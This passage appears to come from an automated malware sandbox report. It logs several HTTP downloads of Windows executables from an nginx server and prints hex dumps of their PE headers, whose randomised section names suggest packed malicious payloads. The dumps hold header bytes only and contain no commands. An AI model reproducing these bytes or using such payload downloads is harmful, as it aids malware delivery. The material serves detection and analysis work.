00 00 00 00 e0 00 2e 01 0b 01 30 00 00 2a 01 00 00 08 00 00 00 00 00 00 0e 49 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 0b 00 00 06 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 48 01 00 4b 00 00 00 00 60 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 0c 00 00 00 78 48 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 29 01 00 00 20 00 00 00 2a 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 60 01 00 00 06 00 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 01 00 00 02 00 00 00 36 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 14 05 00 00 a0 01 00 00 14 05 00 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 00 14 05 00 00 c0 06 00 00 14 05 00 00 4c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:48 GMTContent-Type: application/octet-streamContent-Length: 332800Last-Modified: Fri, 07 Feb 2025 04:36:30 GMTConnection: keep-aliveETag: "67a58dce-51400"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 aa 00 00 00 00 00 00 40 b9 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d9 9b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 05 00 10 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 9d 04 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 64 04 00 00 10 00 00 00 66 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 73 20 00 00 00 80 04 00 00 22 00 00 00 6a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f4 cf 00 00 00 b0 04 00 00 4e 00 00 00 8c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 10 39 00 00 00 80 05 00 00 3a 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:47 GMTContent-Type: application/octet-streamContent-Length: 1775616Last-Modified: Tue, 11 Feb 2025 17:09:31 GMTConnection: keep-aliveETag: "67ab844b-1b1800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 46 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 8d 0e 1c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 72 72 6e 62 6f 6d 6e 00 a0 1a 00 00 60 2b 00 00 8a 1a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 62 67 63 6a 79 72 70 00 20 00 00 00 00 46 00 00 04 00 00 00 f2 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 46 00 00 22 00 00 00 f6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:50 GMTContent-Type: application/octet-streamContent-Length: 2155008Last-Modified: Tue, 11 Feb 2025 17:11:35 GMTConnection: keep-aliveETag: "67ab84c7-20e200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 51 4b 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ae 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 ad 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 70 70 74 66 73 68 65 00 30 1a 00 00 90 31 00 00 24 1a 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 67 6f 62 61 66 74 6d 00 10 00 00 00 c0 4b 00 00 04 00 00 00 bc 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4b 00 00 22 00 00 00 c0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:52 GMTContent-Type: application/octet-streamContent-Length: 2150912Last-Modified: Tue, 11 Feb 2025 16:41:29 GMTConnection: keep-aliveETag: "67ab7db9-20d200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d e9 b6 df 59 88 d8 8c 59 88 d8 8c 59 88 d8 8c 33 94 da 8c 70 88 d8 8c 59 88 d9 8c 5b 88 d8 8c eb 94 c8 8c 5b 88 d8 8c 59 88 d8 8c 56 88 d8 8c e1 8e de 8c 58 88 d8 8c 52 69 63 68 59 88 d8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 97 bb 8b 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 de 00 00 00 b6 05 00 00 00 00 00 00 40 4b 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 4b 00 00 04 00 00 8c 28 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 e0 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 06 00 00 10 00 00 00 4a 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 e0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 00 07 00 00 02 00 00 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 6f 61 73 6a 63 61 79 00 50 1a 00 00 e0 30 00 00 4a 1a 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 67 74 6b 70 74 77 6b 00 10 00 00 00 30 4b 00 00 04 00 00 00 ac 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4b 00 00 22 00 00 00 b0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:02 GMTContent-Type: application/octet-streamContent-Length: 3218752Last-Modified: Tue, 11 Feb 2025 05:41:47 GMTConnection: keep-aliveETag: "67aae31b-311d40"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c8 f2 43 da 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 f0 00 00 00 08 00 00 00 00 00 00 be 0e 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 31 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 0e 01 00 4b 00 00 00 00 20 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 d8 30 00 40 45 00 00 00 40 01 00 0c 00 00 00 21 0e 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 ee 00 00 00 20 00 00 00 f0 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 20 01 00 00 06 00 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 dc 2f 00 00 60 01 00 00 dc 2f 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:09 GMTContent-Type: application/octet-streamContent-Length: 2074624Last-Modified: Sun, 09 Feb 2025 11:32:34 GMTConnection: keep-aliveETag: "67a89252-1fa800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ac 00 00 00 00 00 00 00 70 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4a 00 00 04 00 00 da d7 1f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 70 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 80 05 00 00 02 00 00 00 80 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 82 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 05 00 00 02 00 00 00 84 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 75 66 6d 62 74 6c 78 00 00 1a 00 00 60 30 00 00 fa 19 00 00 86 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 72 68 6e 64 63 6c 66 00 10 00 00 00 60 4a 00 00 06 00 00 00 80 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4a 00 00 22 00 00 00 86 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:20 GMTContent-Type: application/octet-streamContent-Length: 2168320Last-Modified: Sat, 08 Feb 2025 13:31:29 GMTConnection: keep-aliveETag: "67a75cb1-211600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d e9 b6 df 59 88 d8 8c 59 88 d8 8c 59 88 d8 8c 33 94 da 8c 70 88 d8 8c 59 88 d9 8c 5b 88 d8 8c eb 94 c8 8c 5b 88 d8 8c 59 88 d8 8c 56 88 d8 8c e1 8e de 8c 58 88 d8 8c 52 69 63 68 59 88 d8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 45 5f 8e 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 de 00 00 00 b6 05 00 00 00 00 00 00 c0 4b 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 4b 00 00 04 00 00 21 06 22 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 e0 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 